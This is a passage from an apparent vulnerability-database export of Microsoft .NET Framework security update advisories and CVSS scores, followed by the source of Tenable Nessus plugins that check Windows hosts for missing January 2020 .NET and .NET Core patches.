application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in some parts of this update\n\n**Symptom**| This update does not install, and it returns either or both of the following error messages:\n\n * -2146762495\n * A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file. \n---|--- \n**Workaround**| For details see the article for the .NET Framework individual product version for detailed instructions. \n \n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552939](<https://support.microsoft.com/help/4552939>) Description of the Security and Quality Rollup for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4552939) \n * [4552920](<https://support.microsoft.com/help/4552920>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552920) \n * [4552919](<https://support.microsoft.com/help/4552919>) Description of the Security and Quality Rollup for .NET Framework 4.6 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552919) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4556402)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-1066", "CVE-2020-1108"], "modified": "2020-05-12T07:00:00", "id": "KB4556402", "href": "https://support.microsoft.com/en-us/help/4556402", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:41:02", "description": "None\n## Notice\n\n**Revised 6/8/2021** On June 8th, 2021, this update was released to replace a previous update to address a \u201crevocation server was offline\u201d error that may occur during installation. If you've already installed a previous release of this update, no action is required. To obtain the latest version of these updates, see the \"How to obtain and install the update\" section of the individual update article. Links to each article are found in the \"Additional information about this update\" section of this article. On April 13th, 2021, this update was released to replace a previous release of this update.On July 23, 2020, update KB4552952 v2, KB4552951 v2, and KB4552953 v2 were released to replace v1 of those updates for .NET Framework 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, and 4.8 for Windows 7 Service Pack 1 (SP1) and Windows Server 2008 R2 SP1. The v1 updates did not install for customers who had certain ESU configurations. The v2 updates correct the issue for customers who could not install the v1 updates. \n\n**Applies to:**Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8\n\n**IMPORTANT** Verify that you have installed the required updates listed in the **How to get this update** section before installing this update. \n\n**IMPORTANT **Some customers who use Windows Server 2008 R2 SP1 and have activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on the affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU/t_blank>) post.\n\n**IMPORTANT **WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n**IMPORTANT **Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/en-us/help/4522133/procedure-to-continue-receiving-security-updates>) to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates>).\n\n**IMPORTANT **Starting on January 15, 2020, a full-screen notification will appear that describes the risk of continuing to use Windows 7 Service Pack 1 after it reaches end of support on January 14, 2020. The notification will remain on the screen until you interact with it. This notification will only appear on the following editions of Windows 7 Service Pack 1:**Note **The notification will not appear on domain-joined machines or machines in kiosk mode.\n\n * Starter.\n * Home Basic.\n * Home Premium.\n * Professional. If you have purchased the Extended Security Update (ESU), the notification will not appear. For more information, see [How to get Extended Security Updates for eligible Windows devices](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/archived-how-to-get-extended-security-updates-for-eligible/ba-p/917807>) and [Lifecycle FAQ-Extended Security Updates](<https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates>).\n * Ultimate.\n\n**IMPORTANT** Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n\n**IMPORTANT** All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n\n**IMPORTANT** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Summary\n\nAn elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program. The update addresses the vulnerability by correcting how .NET Framework activates COM objects.To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n\n * [CVE-2020-1066](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1066>)\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file.To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests.To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in some parts of this update\n\n**Symptom**| This update does not install, and it returns either or both of the following error messages:\n\n * -2146762495\n * A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.\n * The revocation function was unable to check revocation because the revocation server was offline. \n---|--- \n**Workaround**| This issue was corrected by the latest release of the affected parts in this update.If you've already installed a previous release of the affected parts, no action is required. \n \n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552965](<https://support.microsoft.com/help/4552965>) Description of the Security Only Update for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4552965)\n * [4552952](<https://support.microsoft.com/help/4552952>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552952)\n * [4552951](<https://support.microsoft.com/help/4552951>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552951)\n * [4552953](<https://support.microsoft.com/help/4552953>) Description of the Security Only Update for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4552953)\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4556403)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1066", "CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4556403", "href": "https://support.microsoft.com/en-us/help/4556403", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-06-16T15:25:08", "description": "The Microsoft .NET Framework installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-16T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft .NET Framework (January 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS20_JAN_DOTNET.NASL", "href": "https://www.tenable.com/plugins/nessus/132999", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132999);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-0605\", \"CVE-2020-0606\", \"CVE-2020-0646\");\n script_xref(name:\"MSKB\", value:\"4532935\");\n script_xref(name:\"MSKB\", value:\"4535101\");\n script_xref(name:\"MSKB\", value:\"4535103\");\n script_xref(name:\"MSKB\", value:\"4535102\");\n script_xref(name:\"MSKB\", value:\"4535105\");\n script_xref(name:\"MSKB\", value:\"4535104\");\n script_xref(name:\"MSKB\", value:\"4532933\");\n script_xref(name:\"MSKB\", value:\"4534271\");\n script_xref(name:\"MSKB\", value:\"4532938\");\n script_xref(name:\"MSKB\", value:\"4534306\");\n script_xref(name:\"MSKB\", value:\"4534977\");\n script_xref(name:\"MSKB\", value:\"4534976\");\n script_xref(name:\"MSKB\", value:\"4532936\");\n script_xref(name:\"MSKB\", value:\"4534276\");\n script_xref(name:\"MSKB\", value:\"4534293\");\n script_xref(name:\"MSKB\", value:\"4534979\");\n script_xref(name:\"MSKB\", value:\"4534978\");\n script_xref(name:\"MSFT\", value:\"MS20-4532935\");\n script_xref(name:\"MSFT\", value:\"MS20-4535101\");\n script_xref(name:\"MSFT\", value:\"MS20-4535103\");\n script_xref(name:\"MSFT\", value:\"MS20-4535102\");\n script_xref(name:\"MSFT\", value:\"MS20-4535105\");\n script_xref(name:\"MSFT\", value:\"MS20-4535104\");\n script_xref(name:\"MSFT\", value:\"MS20-4532933\");\n script_xref(name:\"MSFT\", value:\"MS20-4534271\");\n script_xref(name:\"MSFT\", value:\"MS20-4532938\");\n script_xref(name:\"MSFT\", value:\"MS20-4534306\");\n script_xref(name:\"MSFT\", value:\"MS20-4534977\");\n script_xref(name:\"MSFT\", value:\"MS20-4534976\");\n script_xref(name:\"MSFT\", value:\"MS20-4532936\");\n script_xref(name:\"MSFT\", value:\"MS20-4534276\");\n script_xref(name:\"MSFT\", value:\"MS20-4534293\");\n script_xref(name:\"MSFT\", value:\"MS20-4534979\");\n script_xref(name:\"MSFT\", value:\"MS20-4534978\");\n script_xref(name:\"IAVA\", value:\"2020-A-0028-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Security Updates for Microsoft .NET Framework (January 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft .NET Framework installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Framework installation on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\");\n # https://support.microsoft.com/en-us/help/4532935/kb4532935-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?71a4b34c\");\n # https://support.microsoft.com/en-us/help/4535101/kb4535101-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dd1d619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535103/kb4535103\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535102/kb4535102\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535105/kb4535105\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535104/kb4535104\");\n # https://support.microsoft.com/en-us/help/4532933/kb4532933-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d6758a7c\");\n # https://support.microsoft.com/en-us/help/4534271/windows-10-update-kb4534271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e147f537\");\n # https://support.microsoft.com/en-us/help/4532938/kb4532938-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f331705\");\n # https://support.microsoft.com/en-us/help/4534306/windows-10-update-kb4534306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fd98f0c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534977/kb4534977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534976/kb4534976\");\n # https://support.microsoft.com/en-us/help/4532936/kb4532936-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4bff0836\");\n # https://support.microsoft.com/en-us/help/4534276/windows-10-update-kb4534276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c9c3e46\");\n # https://support.microsoft.com/en-us/help/4534293/windows-10-update-kb4534293\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c0e39b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534979/kb4534979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534978/kb4534978\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for Microsoft .NET Framework.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_dotnet_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-01';\nkbs = make_list(\n '4532935',\n '4535101',\n '4535103',\n '4535102',\n '4535105',\n '4535104',\n '4532933',\n '4534271',\n '4532938',\n '4534306',\n '4534977',\n '4534976',\n '4532936',\n '4534276',\n '4534293',\n '4534979',\n '4534978'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && 'Windows 8.1' >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\nelse if ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\napp = 'Microsoft .NET Framework';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninstalls = get_combined_installs(app_name:app);\n\nvuln = 0;\n\nif (installs[0] == 0)\n{\n foreach install (installs[1])\n {\n version = install['version'];\n if( version != UNKNOWN_VER &&\n smb_check_dotnet_rollup(rollup_date:'01_2020', dotnet_ver:version))\n vuln++;\n }\n}\nif(vuln)\n{\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T15:01:52", "description": "The Microsoft .NET Core installation on the remote host is version 3.0.x < 3.0.2 or 3.1.x < 3.1.1. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2020-0605, CVE-2020-0606)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-01-16T00:00:00", "type": "nessus", "title": "Security Update for .NET Core (January 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606"], "modified": "2020-05-15T00:00:00", "cpe": ["cpe:/a:microsoft:.net_core"], "id": "SMB_NT_MS20_JAN_DOTNET_CORE.NASL", "href": "https://www.tenable.com/plugins/nessus/132993", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132993);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/15\");\n\n script_cve_id(\"CVE-2020-0605\", \"CVE-2020-0606\");\n script_xref(name:\"IAVA\", value:\"2020-A-0031-S\");\n\n script_name(english:\"Security Update for .NET Core (January 2020)\");\n script_summary(english:\"Checks for Windows Install of .NET Core.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple .NET Core vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Core installation on the remote host is version 3.0.x < 3.0.2 or 3.1.x < 3.1.1. It is, therefore,\naffected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of\n a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the\n current user. If the current user is logged on with administrative user rights, an attacker could take control of\n the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts\n with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less\n impacted than users who operate with administrative user rights. (CVE-2020-0605, CVE-2020-0606)\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e287012\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa0a6c3c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/announcements/issues/148\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/announcements/issues/149\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to vendor documentation.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0606\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_core\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_dotnet_core_win.nbin\");\n script_require_keys(\"installed_sw/.NET Core Windows\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = '.NET Core Windows';\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '3.0.0', 'fixed_version' : '3.0.2' },\n { 'min_version' : '3.1.0', 'fixed_version' : '3.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T15:01:53", "description": "The Microsoft .NET Core SDK installation on the remote host is version 2.1.x < 2.1.511 or 2.1.608, 3.0.x < 3.0.102, or 3.1.x < 3.1.101. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application.\n The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. (CVE-2020-0602)\n\n - A remote code execution vulnerability exists in ASP.NET Core software when the software fails to handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2020-0603)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2020-0605, CVE-2020-0606)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-01-16T00:00:00", "type": "nessus", "title": "Security Update for .NET Core SDK (January 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0602", "CVE-2020-0603", "CVE-2020-0605", "CVE-2020-0606"], "modified": "2020-05-15T00:00:00", "cpe": ["cpe:/a:microsoft:.net_core"], "id": "SMB_NT_MS20_JAN_DOTNET_CORE_SDK.NASL", "href": "https://www.tenable.com/plugins/nessus/132994", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132994);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/15\");\n\n script_cve_id(\n \"CVE-2020-0602\",\n \"CVE-2020-0603\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0031-S\");\n\n script_name(english:\"Security Update for .NET Core SDK 